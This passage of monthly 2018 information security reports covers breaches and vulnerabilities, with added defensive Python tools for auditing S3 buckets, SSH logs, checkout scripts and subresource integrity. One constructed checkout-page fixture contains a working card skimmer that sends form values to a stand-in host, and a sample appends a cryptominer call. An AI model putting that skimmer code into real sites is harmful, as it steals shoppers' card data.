    Users should ensure that Drupal 7 is updated to version 7.60, Drupal 8.5 is updated to version 8.5.2 and Drupal 8.6 is updated to version 8.6.2. Additionally, any versions of Drupal 8 before version 8.5 are no longer supported and, therefore, will not receive the security updates. (4)
  • Windows 10/Server 2016/Server 2019 Microsoft Data Sharing Zero-day Vulnerability:
    A security researcher has disclosed a Windows zero-day vulnerability on Twitter for the second time in two months. Proof of concept (PoC) code was also published on GitHub; it can delete critical Windows files and cause the operating system to crash. The vulnerability is in the local Microsoft Data Sharing service (dssvc.dll) present in recent Windows versions, including Windows 10 (fully patched as of the October 2018 update), Windows Server 2016 and Windows Server 2019. An attacker who already has low-privileged access to the system can exploit it to delete files that normally only administrators can delete and, with modifications to the PoC, take further privileged actions.
    Microsoft is working on a fix. In the meantime, follow security best practices, limit local access to untrusted users and monitor for anomalous activity such as unexpected deletion of system files. (5)

Recent Breaches

A data breach at Cathay Pacific Airways has prompted calls to review Hong Kong’s breach disclosure rules.

  • Cathay Pacific Major Data Breach:
    Hong Kong's flag carrier Cathay Pacific has suffered a major data breach in which attackers accessed the personal data of about 9.4 million passengers. Exposed details include passenger names, nationalities, dates of birth, phone numbers and email addresses. The attackers also obtained 860,000 passport numbers, 245,000 Hong Kong identity card numbers, 403 expired credit card numbers and 27 credit card numbers without card verification values (CVV).
    Hong Kong's Privacy Commissioner, Stephen Wong Kai-yi, has pledged legal help for affected customers. Cathay Pacific and IT experts recommend that passengers watch for suspicious emails or account activity, as phishing that references the breach is expected to follow. (6)
  • Leaky Amazon S3 Bucket Exposes Washington ISP Customer Data:
    Washington Internet service provider Pocket iNet had over 73 GB of data publicly exposed through a misconfigured Amazon S3 bucket. The exposed data included plaintext passwords and AWS secret keys for Pocket iNet employees, internal network diagrams, configuration details, inventory lists and photographs of equipment, as well as details of priority customers.
    This type of exposure is avoided by auditing bucket ACLs and bucket policies on a schedule, blocking public access unless a bucket is deliberately public, and never storing long-lived credentials such as AWS secret keys in object storage in the first place. (7)
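    A practical version of that audit reads each bucket's ACL and bucket policy and flags anything that grants access to everyone. The Python below is an added example, not Pocket iNet's or AWS's code: the ACL and policy documents are constructed in the shape boto3 returns them, so the check runs offline, and the bucket names are placeholders. The same check applies to the publicly writable LA Times bucket and the 123 million household records in the March and January 2018 reports further down this page.

```python
"""Offline check of an S3 bucket's ACL and bucket policy for public access.
Added example, not Pocket iNet's or AWS's code. The two inputs have the
shape returned by boto3's get_bucket_acl() and get_bucket_policy()['Policy'],
but the samples below are constructed so the check runs without credentials."""
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS, AUTH_USERS}


def public_acl_grants(acl):
    """Permissions granted to everyone (AllUsers) or to any AWS account
    (AuthenticatedUsers, which is effectively public). WRITE grants are the
    worst case: they let an attacker change what the bucket serves."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append((grantee["URI"].rsplit("/", 1)[-1], grant["Permission"]))
    return findings


def _wildcard_principal(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(policy):
    """Split Allow statements with a wildcard principal into those with no
    Condition (public) and those with a Condition (manual review: an
    aws:SourceIp or aws:Referer condition may or may not be acceptable)."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    unconditional, conditional = [], []
    for statement in policy.get("Statement", []):
        if statement.get("Effect") != "Allow" or not _wildcard_principal(statement.get("Principal")):
            continue
        actions = statement.get("Action", [])
        actions = [actions] if isinstance(actions, str) else list(actions)
        (conditional if statement.get("Condition") else unconditional).append(actions)
    return unconditional, conditional


def assess_bucket(name, acl, policy=None):
    """One verdict per bucket, combining both checks."""
    acl_findings = public_acl_grants(acl)
    open_statements, review = public_policy_statements(policy) if policy else ([], [])
    return {
        "bucket": name,
        "public": bool(acl_findings or open_statements),
        "acl_grants": acl_findings,
        "open_policy_actions": sorted({a for acts in open_statements for a in acts}),
        "needs_review": review,
    }


# Constructed samples: a leaky bucket and a correctly private one.
OWNER = {"Type": "CanonicalUser", "ID": "example-owner-id"}
LEAKY_ACL = {"Owner": {"ID": "example-owner-id"}, "Grants": [
    {"Grantee": OWNER, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
]}
LEAKY_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-leaky-bucket/*"},
    {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": ["s3:ListBucket"],
     "Resource": "arn:aws:s3:::example-leaky-bucket",
     "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
]})
PRIVATE_ACL = {"Owner": {"ID": "example-owner-id"},
               "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}

if __name__ == "__main__":
    print(assess_bucket("example-leaky-bucket", LEAKY_ACL, LEAKY_POLICY))
    print(assess_bucket("example-private-bucket", PRIVATE_ACL))
```

    Wired to a live account, `s3.get_bucket_acl(Bucket=name)` and `s3.get_bucket_policy(Bucket=name)["Policy"]` supply the two inputs for every bucket returned by `s3.list_buckets()` (the policy call raises a ClientError with code NoSuchBucketPolicy when a bucket has none, which simply means no policy to check). Account-level S3 Block Public Access, which AWS introduced in November 2018, is the guardrail that makes this class of mistake impossible rather than merely detectable.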

Other News


  • California passes Bill on IoT Device Security:
    California has passed legislation (SB-327) that bans weak default passwords on Internet-connected devices sold in the state. From 2020, manufacturers must either give each device a unique preprogrammed password or require the user to set a new means of authentication before access is granted for the first time.
    This should reduce the number of devices compromised through hardcoded or shared default credentials, which is how botnets such as Mirai recruited their devices. (8)

References

Information Security Report | October 2018


The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

This month features a new strain of malware that skims credit card details entered on Magento eCommerce sites, Internet-scanning malware that targets public SSH servers using default account names with elevated privileges, more hardcoded root passwords in Cisco products and a new acoustic attack that narrows down the unlock pattern used on Android devices. Notable breaches include card-skimming malware on the electronics retailer Newegg, malicious banking apps impersonating ANZ and CBA apps on the Google Play store, and customer data stored in plaintext on auctioned NCIX hardware.

Current Threats and Exploits


  • Magento eCommerce Malware:
    A security researcher has discovered a new strain of malware (dubbed MagentoCore) that skims the credit card details customers enter on sites running the Magento eCommerce platform. It has been found on more than 7,000 Magento sites currently in operation. To infect a site, the attacker brute-forces the administrator login and then embeds a line of JavaScript in the site. The JavaScript records the characters typed into checkout forms and sends them to a server at magentocore[dot]net, hosted in Russia.
    If you run Magento, check the site's templates and stored content for unauthorised JavaScript, and make sure administrator accounts use strong, unique passwords and, ideally, two-factor authentication. (1)
  • Acoustic Echo Location Attacks on Smartphones:
    Security researchers have demonstrated a new acoustic attack that narrows down the unlock pattern used on Android devices. The attack uses the phone's speakers to emit inaudible sounds that echo off the user's finger and are picked up by the phone's microphones. From the echoes, the approximate movement of the finger can be reconstructed. The researchers used this to track a user's finger while the unlock pattern was entered on a Samsung Android phone and were able to reliably eliminate 70% of the possible patterns, greatly shortening the time needed to gain access to the device.
    While the attack is a research result rather than something seen in the wild, users are advised to use a more robust unlock method, such as a PIN or passphrase, instead of a pattern. (2)
  • Malware Targeting Public SSH Servers:
    Researchers have discovered GoScanSSH, malware that scans the Internet for public SSH servers and attempts to log in with default account names. It is not known to exploit any software vulnerability; instead it targets account names likely to carry elevated privileges, such as 'root' and 'admin', using a list of common passwords. After a successful login it uploads a copy of itself and repeats the attack against other systems. It then checks in with its command-and-control (C2) server through the Tor2web proxy service, which hides the C2 server's location from defenders. Notably, when scanning for systems to infect it excludes IP ranges belonging to certain military and government networks.
    To reduce the risk of infection, administrators should ensure that default account names (especially privileged ones) are either disabled for remote SSH login (for example PermitRootLogin no in sshd_config) or restricted to key-based authentication, and should treat outbound connections to Tor2web gateways as likely indicators of compromise worth investigating. (3)
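    Both recommendations can be checked in logs. The Python below is an added example, not from the researchers' report: it scores sshd authentication lines for brute forcing of default account names and for a successful login from a source that had just been failing, and it flags DNS lookups of Tor2web gateway names. The log lines are constructed (RFC 5737 test addresses and an invented .onion name), and the gateway suffix list is an assumption that has to be maintained.

```python
"""Detecting GoScanSSH-style activity in sshd and DNS logs. Added example;
the log lines are constructed (RFC 5737 test addresses, invented onion name)
and the Tor2web gateway list is an assumption that must be kept current."""
import re
from collections import defaultdict

# Account names such scanners try first; extend for your environment.
DEFAULT_ACCOUNTS = {"root", "admin", "administrator", "pi", "ubuntu", "user",
                    "guest", "test", "oracle", "postgres"}
TOR2WEB_SUFFIXES = (".onion.to", ".onion.link", ".onion.cab", ".onion.ws",
                    ".tor2web.org", ".tor2web.io")

SSHD_LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[0-9A-Fa-f.:]+) port \d+")
DNS_QUERY = re.compile(r"query: (?P<name>[A-Za-z0-9.-]+) IN [A-Z]+")

SSHD_SAMPLE = """\
Sep 12 03:14:01 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 40110 ssh2
Sep 12 03:14:03 web1 sshd[2103]: Failed password for root from 203.0.113.7 port 40112 ssh2
Sep 12 03:14:05 web1 sshd[2105]: Failed password for invalid user admin from 203.0.113.7 port 40114 ssh2
Sep 12 03:14:07 web1 sshd[2107]: Failed password for invalid user admin from 203.0.113.7 port 40116 ssh2
Sep 12 03:14:09 web1 sshd[2109]: Failed password for root from 203.0.113.7 port 40118 ssh2
Sep 12 03:14:11 web1 sshd[2111]: Accepted password for root from 203.0.113.7 port 40120 ssh2
Sep 12 03:20:00 web1 sshd[2150]: Accepted publickey for deploy from 198.51.100.9 port 51000 ssh2: ED25519 SHA256:constructed
""".splitlines()

DNS_SAMPLE = """\
Sep 12 03:14:30 ns1 named[771]: client 10.0.0.5#5353: query: www.example.com IN A + (10.0.0.1)
Sep 12 03:14:31 ns1 named[771]: client 10.0.0.12#4412: query: abcdefghijklmnop.onion.to IN A + (10.0.0.1)
""".splitlines()


def analyse_sshd(lines, threshold=5):
    """Return (brute_force, suspicious_logins).

    brute_force: {src: {user: failures}} for sources with at least `threshold`
    failures that included a default account name.
    suspicious_logins: [(src, user)] for an Accepted login from a source that
    had already failed in this window, i.e. a probable successful guess."""
    failures = defaultdict(lambda: defaultdict(int))
    suspicious = []
    for line in lines:
        match = SSHD_LINE.search(line)
        if not match:
            continue
        src, user = match["src"], match["user"]
        if match["result"] == "Failed":
            failures[src][user] += 1
        elif src in failures:
            suspicious.append((src, user))
    brute_force = {src: dict(users) for src, users in failures.items()
                   if sum(users.values()) >= threshold and set(users) & DEFAULT_ACCOUNTS}
    return brute_force, suspicious


def tor2web_lookups(lines):
    """Hostnames resolved through a Tor2web gateway: the malware's C2
    check-in path, and rarely legitimate traffic from a server."""
    hits = []
    for line in lines:
        match = DNS_QUERY.search(line)
        if match and match["name"].lower().endswith(TOR2WEB_SUFFIXES):
            hits.append(match["name"])
    return hits


if __name__ == "__main__":
    print(analyse_sshd(SSHD_SAMPLE))
    print(tor2web_lookups(DNS_SAMPLE))
```

    The threshold and the account list are the tuning knobs; in practice the "Accepted after failures" signal is the one worth paging on, since it marks the moment a guess worked.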
  • More Cisco Hardcoded Passwords:
    Cisco has released patches for its Video Surveillance Manager (VSM) software that remove a hardcoded root password. The password allows anyone who knows it to log in to any affected VSM appliance as root. Only VSM releases 7.10, 7.11 and 7.11.1 are affected.
    Users of these systems should install the patches as soon as possible and, in the meantime, restrict network access to VSM management interfaces. (4)


Magecart credit card skimming malware has struck again, this month targeting the computer and electronics retailer Newegg.

Recent Breaches


  • Newegg Customers Affected by Magecart Malware:
    The computer and electronics retailer Newegg was infected with card-skimming malware attributed to Magecart, the group behind the British Airways and Ticketmaster compromises. The skimmer sat on Newegg's payment processing page and captured credit card details from 14 August to 18 September 2018. Newegg has informed customers that it is investigating how the site was compromised and has warned those who purchased goods during that window.
    The statement recommends that affected customers freeze their credit cards and monitor and report any suspicious activity on their bank accounts. (5)
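    Both skimmers in this report, the MagentoCore injection described under Current Threats above and the Newegg compromise here, were a few lines of JavaScript that had no business being on a checkout page. The audit below is an added example, not code from either investigation: it lists every external script host that is not on an allowlist and flags inline scripts that both read form fields and send data off-site. The checkout page, the shop.example hosts and the stats-cdn.invalid skimmer host are constructed.

```python
"""Auditing a checkout page for unauthorised scripts, the control that would
have caught the MagentoCore and Newegg skimmers. Added example, not code
from either investigation. The page and the 'stats-cdn.invalid' skimmer
host are constructed; your allowlist is the set of hosts you expect to
serve script on your checkout."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# A skimmer reads form fields ...
READS_INPUTS = re.compile(
    r"querySelectorAll\(\s*['\"]input|getElementsByTagName\(\s*['\"]input|\.value\b")
# ... and ships them somewhere: image beacon, XHR, fetch, sendBeacon.
EXFILTRATES = re.compile(r"new Image\(\)|XMLHttpRequest|\bfetch\(|sendBeacon|\.src\s*=")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buffer = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buffer = []

    def handle_data(self, data):
        if self._buffer is not None:
            self._buffer.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buffer is not None:
            self.inline.append("".join(self._buffer))
            self._buffer = None


def host_of(url, page_host):
    """Hostname of an absolute or protocol-relative URL; relative URLs are
    served by the page's own host."""
    if url.startswith("//"):
        url = "https:" + url
    parsed = urlparse(url)
    if parsed.scheme and parsed.hostname:
        return parsed.hostname.lower()
    return page_host.lower()


def audit_scripts(html, page_host, allowed_hosts=()):
    allowed = {page_host.lower()} | {h.lower() for h in allowed_hosts}
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    unknown_external = sorted({host_of(s, page_host) for s in collector.external} - allowed)
    suspicious_inline = []
    for body in collector.inline:
        offsite = sorted({host_of(u, page_host) for u in URL_RE.findall(body)} - allowed)
        if offsite and READS_INPUTS.search(body) and EXFILTRATES.search(body):
            suspicious_inline.append({"hosts": offsite, "snippet": " ".join(body.split())[:80]})
    return {"unknown_external": unknown_external, "suspicious_inline": suspicious_inline}


# Constructed checkout page: one legitimate inline script, one injected skimmer.
CHECKOUT_PAGE = """
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/app.js"></script>
<script src="https://stats-cdn.invalid/track.js"></script>
</head><body>
<form id="checkout"><input name="cc_number"><input name="cc_cvv"></form>
<script>document.getElementById('year').textContent = new Date().getFullYear();</script>
<script>
document.getElementById('checkout').addEventListener('keyup', function () {
  var d = {};
  document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  new Image().src = 'https://stats-cdn.invalid/collect?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    print(audit_scripts(CHECKOUT_PAGE, "shop.example", ["cdn.shop.example"]))
```

    Run this against the live checkout page on a schedule and diff the output; a Content-Security-Policy with a strict script-src and a report-uri gives the browser-side equivalent and would also have blocked the beacon to the skimmer host.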
  • NCIX Customer Data Breach:
    Servers seized by the landlord of the now-closed Canadian hardware retailer NCIX were auctioned to private buyers without the confidential customer information on them being removed. The hardware is claimed to have contained credit card numbers for over 260,000 customers, for purchases dating back to 2007, all stored in plaintext, along with purchase histories, contact information and password hashes.
    The breach has sparked debate over who is responsible for sanitising storage media when a business closes. (6)

Other News


  • Fake Banking Apps Scam on Google Play Store:
    More than a thousand bank customers downloaded malicious apps impersonating the legitimate ANZ and CBA banking apps from the Google Play store between June, when they were first reported as fraudulent, and early September, when the security firm ESET alerted Google. ESET noted that banks in the UK, Switzerland and Poland and an Australian cryptocurrency exchange were also impersonated. Because the apps were on the official Android store they earned customers' trust and stole their credentials, including login details, passwords and credit card numbers. Neither ANZ nor CBA were obliged to inform the public or notify authorities, because their own systems were not compromised. The incident has exposed serious gaps in Google Play's automated vetting of new apps.
    Customers who believe they may have downloaded a fake app, or who notice unusual transactions, should contact their bank immediately. (7) (8)

References

Information Security Report | September 2018

This month features a serious vulnerability in a number of HP printer/fax combination devices, a new twist on exploiting MikroTik routers to mine cryptocurrency, a critical Apache Struts remote code execution vulnerability that does not require any plugins, details of the breach of Reddit's 2007 backup database, Google's forthcoming plans to block the injection of third-party code into Chrome's browser processes, and how to get free replacement Symantec certificates to avoid Firefox untrusted-certificate warnings.

Current Threats and Exploits


  • HP Printer/Fax Combo Vulnerabilities:
    Security researchers have discovered a serious vulnerability (dubbed Faxploit) in a number of HP printer/fax combination devices. A remote attacker can take control of the device by sending a malicious fax that exploits a flaw in the built-in fax modem. The only prerequisites are that the printer is connected to a phone line and that the attacker knows its fax number, which makes the vulnerability well suited to targeted attacks. Once in control of the device, an attacker can pivot to its LAN interface and launch attacks into the internal network it is connected to. In a demonstration, the researchers used the printer to launch the EternalBlue exploit against computers on the same LAN.
    HP has released patches for the affected devices, and anyone using an HP printer/fax combination should check for updates. If the fax function is not used, disconnecting the phone line removes the attack surface entirely. (1)
  • Cryptocurrency Mining Code Dynamically Injected into Browsing Sessions:
    Attackers have used a well-known exploit to compromise over 200,000 MikroTik routers and put them to work mining cryptocurrency, but not in the usual way. Instead of running a miner on the router itself, they configured the router to inject the Coinhive mining JavaScript into HTTP sessions passing through it. Users downstream of a compromised router received the mining code in the pages they browsed and generated revenue for the attacker, and where web servers sat behind an affected router, the mining code was injected into every HTTP page they served. The affected routers included ISP-grade devices, greatly increasing the number of affected users. Note that only plain HTTP traffic is affected: the router cannot inject code into encrypted HTTPS sessions, which is one more argument for serving every page over HTTPS.
    All users of MikroTik routers should ensure they are running the latest RouterOS release and that the router's management services are not exposed to the Internet. (2)
  • Another Critical Apache Struts Remote Code Execution Vulnerability:
    Apache has announced another critical remote code execution vulnerability in the Struts 2 framework (CVE-2018-11776, advisory S2-057). The flaw is in the Struts core itself, so it is exploitable without any additional plugins installed. The attack requires no authentication, and it is thought to be easy for an attacker to determine whether an application is vulnerable.
    Apache Struts users are advised to upgrade to version 2.3.35 or 2.5.17 as soon as possible. (3)


Recent Breaches


  • Old Reddit Data Exposed:
    Reddit has disclosed a data breach that occurred earlier in the month. According to the statement, the attacker gained access to a 2007 backup of the site's database containing usernames and salted password hashes. The affected systems were protected by SMS-based two-factor authentication, but the attacker was able to intercept the SMS codes, a reminder that SMS is a weak second factor.
    Users whose data was exposed have been emailed by Reddit with instructions on what to do next. Reddit has moved its own staff to token-based two-factor authentication and recommends that all its users do the same. (4)

Other News


  • Google Chrome to Block Third Party Code Injection:
    A number of antivirus vendors inject their own code into web browser processes to add protection against malicious sites: the injected code lets them block categories of websites and scan pages for malware. While the injection is intended to make browsing safer, it is not supported by the browser vendors and is a common cause of instability. In response, Google has announced that Chrome will begin notifying users after a crash of any software that injected code into the browser process, and that future versions of Chrome will block third-party code injection outright. It is not yet known what impact (if any) this will have on the overall security of browsing with Chrome; the feature is in a trial rollout, and Google will provide more information in the coming months. (5)
  • Browsers to Distrust Symantec TLS Certificates:
    Nightly builds of Firefox 63 now show an untrusted-certificate warning for certificates issued by Symantec's public certificate authorities, including the Thawte, GeoTrust and RapidSSL brands. Website administrators should replace certificates from these authorities as soon as possible. DigiCert, which has taken over Symantec's certificate business, is offering replacement certificates at no additional cost. Replacing the certificate ensures visitors are not shown an invalid-certificate warning when they visit your site. New certificates should be in place no later than October 2018, when the distrust is planned to reach the release versions of both Firefox (63) and Google Chrome (70). (6)

References

Information Security Report – March 2018


Current Threats and Exploits


  • Crypto Miners Are Sneaking Into Your Networks – Despite dropping out of the news a little this month, cryptocurrency remains a much sought-after commodity, and attackers will do anything possible to make use of your idle CPU time. In the past we have seen malware, advertising, worms and phishing campaigns aiming to deploy mining scripts or software on unsuspecting victims. It was recently reported that a large number of websites around the world, including government sites, served Coinhive mining scripts to their visitors after a third-party accessibility plugin script they all loaded was compromised. Although in-browser mining is also used by some advertisers to monetise sites, the incident highlights the importance of knowing your online supply chain: where your web resource scripts come from, and whether you would notice if one of them changed.
  • Shortened URLs in Phishing – Shortened URLs are once again being widely used in active phishing campaigns. This defeats one of the core user-awareness checks, looking at where a link actually points, because most users recognise and trust shortener services such as Google's goo.gl and Bitly. Typically seen in campaigns harvesting webmail credentials, this vector poses a significant risk to organisations and emphasises the importance of web content filtering and of URL rewriting or expansion at the mail gateway. Users should also be made aware of the technique.
  • Memcached Denial of Service Attacks – A huge number of denial-of-service attacks are being launched from misconfigured Internet-facing memcached servers. These servers accept easily forged UDP packets on port 11211 and return responses many thousands of times larger than the request, which makes them ideal for reflected and amplified denial-of-service attacks. As memcached was never designed to be exposed to the Internet, it is unlikely that any additional security has been configured; the remediation is to firewall the service off from the Internet and, if UDP is not needed, disable it (memcached -U 0).
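Subresource Integrity is the concrete control for the supply-chain point in the first item: the page pins the hash of the script it reviewed, and the browser refuses to run a changed copy, which is exactly what happened to the compromised plugin script. The Python below is an added example, not from the report: it generates the integrity attribute, mirrors the browser's verification decision, and shows the edge case that bites in practice, an unparseable attribute that silently disables the check. The script bytes and the plugin.example URL are constructed.

```python
"""Subresource Integrity (SRI) for third-party scripts, the control that
would have stopped the compromised plugin script from running. Added
example, not from the report. The script bytes below are constructed; in
practice you hash the exact bytes you reviewed and pin that hash in the tag."""
import base64
import hashlib

SUPPORTED = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Integrity token for a resource: '<alg>-<base64 digest>'."""
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, algorithm: str = "sha384") -> str:
    """crossorigin="anonymous" is required for cross-origin SRI checks."""
    return (f'<script src="{src}" integrity="{sri_hash(content, algorithm)}" '
            f'crossorigin="anonymous"></script>')


def verify_sri(content: bytes, integrity: str) -> bool:
    """Mirror the browser's decision. The integrity attribute may list several
    tokens; only the strongest supported algorithm is considered, and any
    matching hash for it passes. Caveat: if no token is parseable (e.g. a
    typo in the algorithm name) the spec says to load the resource as if
    there were no integrity attribute, so a bad attribute silently disables
    the protection."""
    by_algorithm = {}
    for token in integrity.split():
        algorithm, _, digest = token.partition("-")
        digest = digest.split("?", 1)[0]          # strip option-expression suffix
        if algorithm in SUPPORTED:
            by_algorithm.setdefault(algorithm, set()).add(digest)
    if not by_algorithm:
        return True
    strongest = max(by_algorithm, key=lambda a: int(a[3:]))
    actual = base64.b64encode(hashlib.new(strongest, content).digest()).decode("ascii")
    return actual in by_algorithm[strongest]


# Constructed resource and a tampered copy with a miner appended.
ORIGINAL = b"window.readAloud = function (el) { /* accessibility helper */ };\n"
TAMPERED = ORIGINAL + b"var miner = new CoinHive.Anonymous('constructed-key'); miner.start();\n"

if __name__ == "__main__":
    print(script_tag("https://plugin.example/reader.js", ORIGINAL))
    print("original loads:", verify_sri(ORIGINAL, sri_hash(ORIGINAL)))
    print("tampered loads:", verify_sri(TAMPERED, sri_hash(ORIGINAL)))
```

SRI only helps when the resource's bytes are expected to be stable. For a vendor script that changes without notice, host a reviewed copy yourself and pin that; an integrity attribute that is allowed to go stale is one that someone will eventually delete.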

Read more on SANS ISC InfoSec Forums

Recent Breaches


  • Unsecured AWS Once Again Makes News – Poorly secured AWS S3 buckets continue to be a problem. Researchers notified the LA Times after discovering that one of its S3 buckets was publicly writable and had been cryptojacked: an attacker had added a Coinhive script to content served from the bucket, so that visitors' browsers mined Monero for the attacker. A bucket that anyone can write to is far more dangerous than one that anyone can read, because it lets an attacker change what your site delivers.

Read more on Naked Security

Other News


    • Notifiable Data Breaches Scheme Comes into Effect – Australia's Notifiable Data Breaches scheme came into effect this month. This amendment to the Privacy Act requires organisations covered by the Act to notify the Office of the Australian Information Commissioner and affected individuals of eligible data breaches, that is, breaches likely to result in serious harm. All organisations should understand their responsibilities under these changes and update incident response plans to include the assessment and notification steps. For additional information, engage your legal and/or privacy team.

Read more on ZDNet

    • Chrome Will Label HTTP Sites as Not Secure – Starting in July (Chrome 68), Google Chrome will label sites visited over plain HTTP as "Not secure" in the address bar. The move is intended to drive HTTPS adoption and ensure sites default to their HTTPS version.

Read more on Ars Technica

  • Importance of Multifactor Authentication in the Modern Enterprise – Multifactor authentication adds security to the logon process by requiring an additional form of identification beyond the username and password. As credential-based attacks continue to increase, enterprises should evaluate the available multifactor tools and integrate them into their infrastructure to secure logins and access to resources.

Read more on SearchSecurity

Information Security Report – February 2018


Over the past month, we have seen a number of threats, vulnerabilities, and spear phishing attacks affecting organisations worldwide. Read on for a summary of these events to help you assess their implication on your environment.

Current Threats and Exploits


  • Refined Exploits Targeting Legacy Windows Servers and PCs: The vulnerabilities in Microsoft's SMBv1 server (CVE-2017-0146 and CVE-2017-0143) allow remote attackers to execute arbitrary code by sending crafted packets to the SMB service. Three exploits for these vulnerabilities have been rewritten and stabilised and now work against every Windows version from Windows 2000 up to and including Server 2016. Applying all available patches is strongly recommended, as these exploits are being used by worm malware to spread. Additional details on the recommended actions can be found in the references below. (1)
  • WannaMine: Cryptocurrency Mining Malware: An EternalBlue-based malware strain dubbed WannaMine uses the computing resources of infected systems to mine cryptocurrency. It first runs the credential-harvesting tool Mimikatz to steal usernames and passwords from system memory, then uses those credentials and the EternalBlue exploit to spread around the network. (2)(3)
  • Cisco ASA Remote Code Execution and Denial of Service Vulnerability: A vulnerability in the SSL VPN (webvpn) functionality of Cisco ASA software (CVE-2018-0101) is being actively scanned for and attacked across the Internet. By sending crafted XML packets to the webvpn interface, an attacker can reload the device, causing a denial of service, or execute arbitrary code on it. Users of Cisco ASA devices should check their running software version and upgrade as soon as possible. (4)
  • Cisco IOS and IOS XE Software EnergyWise Denial of Service Vulnerabilities: Multiple vulnerabilities in the EnergyWise module of Cisco IOS and IOS XE Software have been disclosed. They are caused by improper parsing of crafted EnergyWise packets sent to an affected device and could allow an unauthenticated, remote attacker to trigger a buffer overflow or reload the device, resulting in a denial of service (DoS). Cisco has released software updates that address these vulnerabilities. (5)
  • Lenovo Networking OS Backdoor: A backdoor that had existed since 2004 has been removed from Lenovo's Enterprise Network Operating System (ENOS), in use on 16 IBM and 16 Lenovo network switch models. The backdoor allows administrative access to the device; Lenovo states it was added by the now-defunct Nortel Networks, from which the product line originated. (6)
  • Cisco ASR 9000 IPv6 Fragmented Packet Denial of Service: Due to incorrect handling of fragmented IPv6 packets on Cisco ASR 9000 Series routers, an unauthenticated remote attacker can cause Trident-based line cards to reload on devices running Cisco IOS XR Software Release 5.3.4 with IPv6 configured. Cisco has released software updates that resolve this issue. (7)(8)

Recent Breaches


  • Russian Hackers Leak 2018 Winter Olympics Emails: A group calling itself 'Fancy Bears' has reportedly retaliated against the banning of Russia from the Winter Olympics by publishing emails relating to the games scheduled for February in South Korea. The group is alleged to be associated with Russian military intelligence. The International Olympic Committee has not commented on the allegations raised by the leaked documents. (9)

Other News


  • Netflix Phishing Campaign: A phishing campaign was reported to be hijacking the Netflix brand to trick users into handing over their login details, credit card number, a photo of themselves and their ID. The fraudsters used a fake website with a valid HTTPS certificate to reassure victims of its legitimacy, a reminder that the padlock only proves the connection is encrypted, not that the site is genuine. (10)

References

Information Security Report – January 2018


Current Threats and Exploits


  • Meltdown? Spectre? Where Can We Find Out More? – Early January saw the industry start the year with a bang, as rumours of an Intel processor bug spread online. On 3 January Google's Project Zero announced that nearly all modern processors are affected by vulnerabilities that, when exploited, allow potentially sensitive information to be read from memory across local security boundaries. A combined response from processor and operating system vendors is under way, with most vendors releasing statements or patches where applicable. Local administrators should assess their organisation's exposure and begin remediation where possible. Additional detail and vendor responses can be found in the references below. (1, 2, 3, 4)
  • Risks Created by Bitcoin's Surge in Popularity – Driven by the rise in the value of bitcoin in recent months, cryptocurrency has become a hot topic for those inside and outside the IT space. With many people newly curious or looking to make quick money in crypto markets, scammers and attackers are also looking to leverage the currencies' new-found popularity. Recent months have seen an increase in bitcoin-related phishing and online scams that aim to steal coins or wallet private keys and passwords from unsuspecting users.

Recent Breaches


  • Forever 21 POS Malware Is a Reminder to Encrypt Data at Rest – Retailer Forever 21 announced that for seven months last year a number of its cash register and point-of-sale (POS) devices were infected with malware that captured payment card details. The malware was also present on some systems where it could read transaction logs on a central server, logs generated by devices that were not themselves compromised. Forever 21 confirmed that encryption on these devices was not always enabled, and during periods when it was off the malware could read the logs and search them for payment card data. POS malware is a constant threat, so it is important to know every system in your organisation that holds or processes payment card information. Regular testing of controls such as encryption of data at rest, and reducing the sensitive information written to logs in the first place, mean that in the event of a compromise the malware has nothing worth finding. (8)
  • Leaky (S3) Buckets at It Again – Once again a publicly exposed Amazon S3 bucket containing sensitive information has been found, this time holding details on an estimated 123 million American households. With more companies using cloud services for storage and business, it is important to understand the access controls that apply to data kept in the cloud, and to review access to cloud services and data regularly. (9)
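The last sentence of the Forever 21 item is the control that turns a POS compromise into a non-event: if card numbers never reach the logs, malware that reads the logs finds nothing. The Python below is an added example, not Forever 21's code: a Luhn-checked redactor and a logging filter that applies it before any record is written. The log lines are constructed and use the standard Visa test numbers; the pos logger name is a placeholder.

```python
"""Keeping payment card numbers out of logs, the 'reduce sensitive data in
logs' control from the Forever 21 item. Added example; the log lines are
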